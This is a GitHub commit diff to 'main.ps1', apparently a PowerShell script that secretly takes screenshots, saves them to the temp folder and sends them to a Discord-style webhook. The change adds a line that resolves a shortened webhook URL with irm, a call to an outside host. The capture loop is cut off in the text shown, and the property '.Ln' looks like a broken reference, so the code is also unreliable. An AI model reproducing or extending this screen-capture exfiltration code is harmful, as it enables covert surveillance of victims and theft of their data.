Update main.ps1

This commit is contained in:
egieb
2024-01-02 22:08:42 +00:00
committed by GitHub
parent 88b7e881b6
commit ffcae2d2c0

View File

@@ -2,6 +2,9 @@ $hookurl = "$dc"
$seconds = 30 # Screenshot interval
$a = 1 # Sceenshot amount
# shortened URL Detection
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}
While ($a -gt 0){
$Filett = "$env:temp\SC.png"
Add-Type -AssemblyName System.Windows.Forms